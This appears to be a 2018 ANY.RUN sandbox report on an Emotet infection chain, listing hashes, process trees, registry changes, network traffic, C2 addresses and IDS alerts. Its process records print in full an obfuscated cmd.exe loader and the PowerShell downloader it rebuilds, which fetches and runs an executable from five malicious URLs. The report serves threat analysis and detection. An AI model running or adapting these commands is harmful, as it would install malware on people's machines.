analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| URL: | http://polar.az/EN_US/Messages/12_18 |
| Full analysis: | https://app.any.run/tasks/a670d226-1a76-4199-bb82-973e4da8b20d |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | December 06, 2018, 12:24:54 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MD5: | E00F78C017361B0EA98762F01C68CAC1 |
| SHA1: | C84EAF38ADAB31F1093A5DFBD5BAC87636588F92 |
| SHA256: | 3D0B5A32C536ED93CD62733366AED096E53DBC83CD9DE2784FF8E1A92996D2B0 |
| SSDEEP: | 3:N1KOKK2Kgrbt8DMn:COq7rb3 |
MALICIOUS
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 2400)
Executes PowerShell scripts
- cmd.exe (PID: 2316)
Request from PowerShell which ran from CMD.EXE
- powershell.exe (PID: 2868)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 2400)
Application was dropped or rewritten from another process
- archivesymbol.exe (PID: 2948)
- 664.exe (PID: 2608)
- 664.exe (PID: 3508)
- archivesymbol.exe (PID: 3056)
Downloads executable files from the Internet
- powershell.exe (PID: 2868)
EMOTET was detected
- archivesymbol.exe (PID: 2948)
Changes the autorun value in the registry
- archivesymbol.exe (PID: 2948)
Connects to CnC server
- archivesymbol.exe (PID: 2948)
SUSPICIOUS
Application launched itself
- WINWORD.EXE (PID: 2400)
Starts Microsoft Office Application
- iexplore.exe (PID: 2976)
- WINWORD.EXE (PID: 2400)
Starts CMD.EXE for commands execution
- cmd.exe (PID: 3756)
Starts itself from another location
- 664.exe (PID: 3508)
Creates files in the user directory
- powershell.exe (PID: 2868)
Executable content was dropped or overwritten
- powershell.exe (PID: 2868)
- 664.exe (PID: 3508)
Connects to unusual port
- archivesymbol.exe (PID: 2948)
INFO
Changes internet zones settings
- iexplore.exe (PID: 2976)
Creates files in the user directory
- WINWORD.EXE (PID: 2400)
- iexplore.exe (PID: 2976)
- iexplore.exe (PID: 3500)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2400)
- WINWORD.EXE (PID: 3640)
Reads Internet Cache Settings
- iexplore.exe (PID: 3500)
Application launched itself
- iexplore.exe (PID: 2976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
42
Monitored processes
11
Malicious processes
8
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2976 | "C:\Program Files\Internet Explorer\iexplore.exe" http://polar.az/EN_US/Messages/12_18 | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3500 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2976 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2400 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\file-7255538679018399[1].doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3640 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3756 | c:\ZUwBsFupKDi\iLbdsvjX\XYPBhNrj\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set aG=QwYhAdXWfbncYvwlDmkIhwG4'yNsaBi$r {quPz,F/O2t\xjUV@o9}RpL+CS-(ME=6eTH:;.)80g&&for %r in (31;29;48;59;64;24;4;37;36;24;70;31;38;56;32;64;10;66;21;60;51;9;47;66;11;44;33;26;66;44;71;7;66;9;58;15;30;66;10;44;70;31;20;8;63;64;24;20;44;44;55;69;41;41;17;66;11;20;5;66;27;30;75;10;71;11;51;17;41;9;5;9;25;32;7;5;50;20;44;44;55;69;41;41;15;66;10;11;20;66;66;27;66;17;28;10;71;11;51;17;41;42;43;40;74;27;6;23;25;40;50;20;44;44;55;69;41;41;44;28;15;15;66;32;27;17;36;15;15;51;32;71;66;27;41;38;7;22;52;20;4;42;50;20;44;44;55;69;41;41;17;51;10;44;30;10;66;75;32;51;71;10;15;41;67;15;63;42;66;30;6;47;50;20;44;44;55;69;41;41;27;28;18;28;55;51;10;75;5;51;10;75;71;11;51;17;41;0;9;43;7;19;17;0;24;71;59;55;15;30;44;61;24;50;24;72;70;31;6;44;38;64;24;47;62;40;24;70;31;18;30;40;33;64;33;24;65;65;23;24;70;31;59;47;58;64;24;37;21;56;24;70;31;49;30;9;64;31;66;10;13;69;44;66;17;55;57;24;45;24;57;31;18;30;40;57;24;71;66;46;66;24;70;8;51;32;66;28;11;20;61;31;19;19;19;33;30;10;33;31;20;8;63;72;34;44;32;25;34;31;38;56;32;71;16;51;21;10;15;51;28;5;40;30;15;66;61;31;19;19;19;39;33;31;49;30;9;72;70;31;26;8;68;64;24;16;36;67;24;70;19;8;33;61;61;22;66;44;60;19;44;66;17;33;31;49;30;9;72;71;15;66;10;75;44;20;33;60;75;66;33;73;74;74;74;74;72;33;34;19;10;13;51;18;66;60;19;44;66;17;33;31;49;30;9;70;31;59;6;11;64;24;56;13;54;24;70;9;32;66;28;18;70;53;53;11;28;44;11;20;34;53;53;31;13;35;37;64;24;28;35;19;24;70;85)do set lkY6=!lkY6!!aG:~%r,1!&&if %r geq 85 p%LOCALAPPDATA:~-4,1%we%ProgramData:~-10,1%shell "!lkY6:*lkY6!=!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2316 | CmD /V:O/C"set aG=QwYhAdXWfbncYvwlDmkIhwG4'yNsaBi$r {quPz,F/O2t\xjUV@o9}RpL+CS-(ME=6eTH:;.)80g&&for %r in (31;29;48;59;64;24;4;37;36;24;70;31;38;56;32;64;10;66;21;60;51;9;47;66;11;44;33;26;66;44;71;7;66;9;58;15;30;66;10;44;70;31;20;8;63;64;24;20;44;44;55;69;41;41;17;66;11;20;5;66;27;30;75;10;71;11;51;17;41;9;5;9;25;32;7;5;50;20;44;44;55;69;41;41;15;66;10;11;20;66;66;27;66;17;28;10;71;11;51;17;41;42;43;40;74;27;6;23;25;40;50;20;44;44;55;69;41;41;44;28;15;15;66;32;27;17;36;15;15;51;32;71;66;27;41;38;7;22;52;20;4;42;50;20;44;44;55;69;41;41;17;51;10;44;30;10;66;75;32;51;71;10;15;41;67;15;63;42;66;30;6;47;50;20;44;44;55;69;41;41;27;28;18;28;55;51;10;75;5;51;10;75;71;11;51;17;41;0;9;43;7;19;17;0;24;71;59;55;15;30;44;61;24;50;24;72;70;31;6;44;38;64;24;47;62;40;24;70;31;18;30;40;33;64;33;24;65;65;23;24;70;31;59;47;58;64;24;37;21;56;24;70;31;49;30;9;64;31;66;10;13;69;44;66;17;55;57;24;45;24;57;31;18;30;40;57;24;71;66;46;66;24;70;8;51;32;66;28;11;20;61;31;19;19;19;33;30;10;33;31;20;8;63;72;34;44;32;25;34;31;38;56;32;71;16;51;21;10;15;51;28;5;40;30;15;66;61;31;19;19;19;39;33;31;49;30;9;72;70;31;26;8;68;64;24;16;36;67;24;70;19;8;33;61;61;22;66;44;60;19;44;66;17;33;31;49;30;9;72;71;15;66;10;75;44;20;33;60;75;66;33;73;74;74;74;74;72;33;34;19;10;13;51;18;66;60;19;44;66;17;33;31;49;30;9;70;31;59;6;11;64;24;56;13;54;24;70;9;32;66;28;18;70;53;53;11;28;44;11;20;34;53;53;31;13;35;37;64;24;28;35;19;24;70;85)do set lkY6=!lkY6!!aG:~%r,1!&&if %r geq 85 powershell "!lkY6:*lkY6!=!"" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2868 | powershell "$BUS='APu';$zLr=new-object Net.WebClient;$hfE='http://mechdesign.com/bdbyrWd@http://lencheeseman.com/O2F0sX4yF@http://tallersmullor.es/zWG9hAO@http://montinegro.nl/TlEOeiXj@http://sakapongdong.com/Qb2WImQ'.Split('@');$Xtz='jMF';$kiF = '664';$SjC='PwL';$Vib=$env:temp+'\'+$kiF+'.exe';foreach($III in $hfE){try{$zLr.DownloadFile($III, $Vib);$NfH='DuT';If ((Get-Item $Vib).length -ge 80000) {Invoke-Item $Vib;$SXc='LvR';break;}}catch{}}$vqP='aqI';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2608 | "C:\Users\admin\AppData\Local\Temp\664.exe" | C:\Users\admin\AppData\Local\Temp\664.exe | — | powershell.exe | |||||||||||
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 Modules
| |||||||||||||||
| 3508 | "C:\Users\admin\AppData\Local\Temp\664.exe" | C:\Users\admin\AppData\Local\Temp\664.exe | 664.exe | ||||||||||||
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 Modules
| |||||||||||||||
| 3056 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 664.exe | |||||||||||
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 Modules
| |||||||||||||||
Total events
2 900
Read events
2 442
Write events
448
Delete events
10
Modification events
| (PID) Process: | (2976) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main |
| Operation: | write | Name: | CompatibilityFlags |
Value: 0 | |||
| (PID) Process: | (2976) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
| (PID) Process: | (2976) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 1 | |||
| (PID) Process: | (2976) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones |
| Operation: | write | Name: | SecuritySafe |
Value: 1 | |||
| (PID) Process: | (2976) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
| (PID) Process: | (2976) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
| Operation: | write | Name: | SavedLegacySettings |
Value: 4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000 | |||
| (PID) Process: | (2976) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active |
| Operation: | write | Name: | {F8871673-F951-11E8-834A-5254004A04AF} |
Value: 0 | |||
| (PID) Process: | (2976) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Type |
Value: 4 | |||
| (PID) Process: | (2976) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Count |
Value: 3 | |||
| (PID) Process: | (2976) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore |
| Operation: | write | Name: | Time |
Value: E2070C00040006000C0019000A00E801 | |||
Executable files
2
Suspicious files
6
Text files
4
Unknown types
4
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2976 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
| 2976 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
| 2976 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF143CBF417BF66B1C.TMP | — | |
MD5:— | SHA256:— | |||
| 2400 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC69F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2400 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_03103405-E11A-4A8F-9C9D-2E9C5D53BE6B.0\14FC16E8.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
| 2976 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFC484D95A5F354D44.TMP | — | |
MD5:— | SHA256:— | |||
| 2976 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{F8871673-F951-11E8-834A-5254004A04AF}.dat | — | |
MD5:— | SHA256:— | |||
| 3640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_03103405-E11A-4A8F-9C9D-2E9C5D53BE6B.0\~DF2CF5896976CC96F8.TMP | — | |
MD5:— | SHA256:— | |||
| 2868 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V8S3LY0Y7Q15KL2KGA3I.temp | — | |
MD5:— | SHA256:— | |||
| 2400 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:887E18720C8B436E55F77E22237C19A7 | SHA256:7CC304C512A0E926FE88515C44848A76FD9F5382FDA17914EEBD99934C45F1D1 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
9
DNS requests
6
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2948 | archivesymbol.exe | GET | — | 142.169.99.1:7080 | http://142.169.99.1:7080/ | CA | — | — | malicious |
2868 | powershell.exe | GET | 200 | 43.245.53.9:80 | http://lencheeseman.com/O2F0sX4yF/ | NZ | executable | 164 Kb | malicious |
2948 | archivesymbol.exe | GET | — | 74.104.175.6:443 | http://74.104.175.6:443/ | US | — | — | malicious |
2948 | archivesymbol.exe | GET | — | 119.92.51.40:8080 | http://119.92.51.40:8080/ | PH | — | — | malicious |
2868 | powershell.exe | GET | 301 | 43.245.53.9:80 | http://lencheeseman.com/O2F0sX4yF | NZ | html | 242 b | malicious |
2868 | powershell.exe | GET | 401 | 192.252.156.25:80 | http://mechdesign.com/bdbyrWd | US | html | 381 b | malicious |
3500 | iexplore.exe | GET | 200 | 54.38.67.163:80 | http://polar.az/EN_US/Messages/12_18/ | FR | document | 91.9 Kb | suspicious |
2976 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
3500 | iexplore.exe | GET | 301 | 54.38.67.163:80 | http://polar.az/EN_US/Messages/12_18 | FR | html | 617 b | suspicious |
2948 | archivesymbol.exe | GET | 200 | 47.205.41.43:80 | http://47.205.41.43/ | US | binary | 132 b | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2976 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
2868 | powershell.exe | 43.245.53.9:80 | lencheeseman.com | Web Drive Limited | NZ | malicious |
2868 | powershell.exe | 192.252.156.25:80 | mechdesign.com | Savvis | US | malicious |
3500 | iexplore.exe | 54.38.67.163:80 | polar.az | OVH SAS | FR | suspicious |
2948 | archivesymbol.exe | 142.169.99.1:7080 | — | TELUS Communications Inc. | CA | malicious |
2948 | archivesymbol.exe | 74.104.175.6:443 | — | MCI Communications Services, Inc. d/b/a Verizon Business | US | malicious |
2948 | archivesymbol.exe | 72.22.245.117:50000 | — | Project Mutual Telephone Cooperative Association, Inc. | US | malicious |
2948 | archivesymbol.exe | 119.92.51.40:8080 | — | Philippine Long Distance Telephone Company | PH | malicious |
2948 | archivesymbol.exe | 47.205.41.43:80 | — | Frontier Communications of America, Inc. | US | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
polar.az |
| suspicious |
www.bing.com |
| whitelisted |
mechdesign.com |
| malicious |
lencheeseman.com |
| malicious |
dns.msftncsi.com |
| shared |
Threats
PID | Process | Class | Message |
|---|---|---|---|
3500 | iexplore.exe | Potential Corporate Privacy Violation | ET POLICY Office Document Download Containing AutoOpen Macro |
3500 | iexplore.exe | Attempted User Privilege Gain | SC ATTEMPTED_USER Microsoft Word 2016 use after free attempt |
2868 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2868 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2868 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2868 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2868 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2948 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2948 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2948 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
4 ETPRO signatures available at the full report